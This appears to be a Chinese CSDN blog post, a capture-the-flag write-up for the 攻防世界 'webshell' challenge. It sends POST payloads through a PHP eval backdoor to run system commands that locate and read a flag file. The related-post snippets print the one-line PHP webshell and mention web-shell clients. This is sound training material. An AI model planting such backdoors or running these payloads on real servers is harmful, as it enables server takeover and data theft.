攻防世界Web新shou区-webshell

最新推荐文章于 2022-08-01 18:06:12 发布
最新推荐文章于 2022-08-01 18:06:12 发布
阅读量1.7k 收藏
点赞数
分类专栏: CTF学习 文章标签: 前端 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56977544/article/details/122278246
版权

题目描述:

小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

  1. 来到场景里发现页面是显示这样一段文字,意识是以post方式提交一个shell参数,然后把shell参数的值当成php代码执行
    在这里插入图片描述
  2. 这里直接使用hackbar插件方便点,我们测试php代码,shell=echo 666;,测试一下,发现确实可以执行
    在这里插入图片描述
  3. 然后我们利用php中的system函数可以执行系统命令来找flag,构造payload shell=system("find / -name flag*");,去·查找flag,最终找到flag文件位置
    在这里插入图片描述
  4. 最后我们cat一下flag内容,构造payloadshell=system("cat /var/www/html/flag.txt"); 得到结果即为本题flag
    在这里插入图片描述
零安道长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界webshellweb简单)
my_name_is_sy的博客
05-29 662
补充了php一句话的相关知识。
AP1140shou-pang.rar
06-08
标题中的"AP1140shou-pang.rar"指的是思科Cisco的AP1140型号无线接入点从瘦模式(FAT)转换到胖模式(FIT)的过程。在这个过程中,AP1140通常从一个依赖于无线控制器的配置转变为独立运行的设备,能够自我管理其无线...
攻防世界(WEB) webshell
qq_54929891的博客
08-25 950
做之前先了解了一下webshell是个什么东西 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己
攻防世界-webshell
Nothing-one的博客
07-28 164
从文件中我们可以看到这是一个一句话木马,我们可以直接用蚁剑进行连接 连接的密码就是我们“shell
攻防世界Webwebshell
Pai_Space
11-05 183
1.解题过程: (1) 进入场景,根据题目中的提示知道主页index上面的话为一句话木马 典型的一句话木马 shell即连接密码 连接后就可以看到服务器的文件了 打开flag.txt得到flag 2.知识点: (1)<?php @eval($_POST['shell']);?> 作用:执行一句话木马,可以从客户端连接服务器,可以进行浏览网站结构等操作 (2)eval函数:将接受的字符串当做代码执行 (3)webs...
攻防世界 | webshell WP
weixin_47982238的博客
09-13 230
转载自http://blog.csdn.net/zouchengzhi1021/article/details/104074674
hang-kong-shou-piao-xi-tong.rar_hang kong shou piao
09-19
【航空售票系统】是一个典型的基于计算机技术的管理信息系统,它主要用于处理航空公司的售票业务,包括售票、查询剩余票量以及退票等核心功能。在这个系统中,我们可以深入探讨以下几个重要的IT知识点: ...
485-2-shou-fa-ok.rar_485
09-23
标题中的“485-2-shou-fa-ok.rar_485”表明这是一个与RS-485通信协议相关的项目,重点在于实现数据的发送和接收。描述中提到使用了PIC16F877单片机,并采用C语言编程,实现了485通信中的一字节数据收发功能,表明这...
2shou.rar_WEB开发_ASP_
08-11
二手交易市场系统是一种具有交互功能的专业商品交易平台,是在网络上建立一个虚拟的二手商场。后台数据库使用SQL Server 2005,前台开发工具使用ASP。本系统采用目前比较流行的ADO数据访问技术,并将每个数据库表的...
zi-dong-shou-yin-liao-ji-.rar_纸币机
最新发布
09-24
自动售出饮料机系统。该饮料机有五种饮料出售,其价钱分别为1元、1.5元、2元、2.5元和3元;系统可接受五种钱币类型,分别为硬币5角、硬币1元、纸币1元、纸币5元和纸币10元;基本要求:第一,每次可以购置一瓶饮料;...
攻防世界WEBWebShell
Zeker62的博客
08-16 113
拿到题目,就说: 就说小明放到了index.php里面 打开网站,访问index.php,这里是个细节,虽然这个题目没有挖坑。 有可能首页不是index.php,所以web一定要完整: http://111.200.241.244:59640/index.php 由此可以知道,木马的密码是shell: 使用中国菜刀,输入密码,直接就可以找到flag了: ...
攻防世界————webshell
weixin_45864041的博客
08-19 416
题目提示小明已经将php的一句话木马,放入index.php中。 打开题目可以看见,我们用中国菜刀连接的密码是shell。 知道了一句话木马的储存位置,和菜刀连接密码,直接用菜刀连接即可 连接后发现有个flag.txt文件,直接打开查看。 获得flag。 ...
攻防世界-WEB-手-webshell
weixin_31610083的博客
10-07 1175
【题目描述】 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 【附件】 在线场景 【过程及思路】 打开在线场景后出现如下字样: 先看一些基础概念。 什么是webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将...
攻防世界webwebshell
star_feather的博客
05-20 660
打开场景后发现页面上有一句话木马,密码是shell, 打开中国蚁剑等扫描工具,添加地址输入密码扫描(以下一蚁剑为例): 添加场景URL(即网址),填写密码: 打开,发现有flag的txt文件,打开即得flag: ...
xctf攻防世界 Web高手进阶 webshell
l8947943的博客
08-01 8830
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。...
攻防世界手练习11之webshell
qq_37872337的博客
08-19 359
0x00        Tips:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。根据这道题的描述,应该是一句话的使用。首先介绍一下一句话,它一般使用post方式接受一个参数,然后通过eval函数把接收的字符串当成php代码来执行,如果成功上传了一句话,就意味着我们可以执行任何php代码甚至系统命令~ 0x01 打开环境,进入页面,由于题目描述直接把一句话写入了index.php,这里直接可以拿菜刀、蚁剑或者冰蝎连
攻防世界web入门-webshell write up
m0_62851980的博客
03-29 444
题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 这题重点在于对木马格式的了解和蚁剑的使用 打开网页页面只有一句话: 你会使用webshell吗? <?php @eval($_POST['shell']);?> 先来稍微了解一下木马:在php语言中,最简单的一句话木马语言为 : <?php @eval($_POST['attack']);?> 这句话中eval()函数表示括号内的语句字符串什么的全都当做代码执行,@表示后面..
攻防世界webshell】解题方法
weixin_43923736的博客
06-16 571
攻防世界webshell】解题方法
攻防世界Web “command_execution、xff_referer、webshell” 题解
qq_53325209的博客
03-21 4626
攻防世界Web “xff_referer、webshell、command_execution” 三道题解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值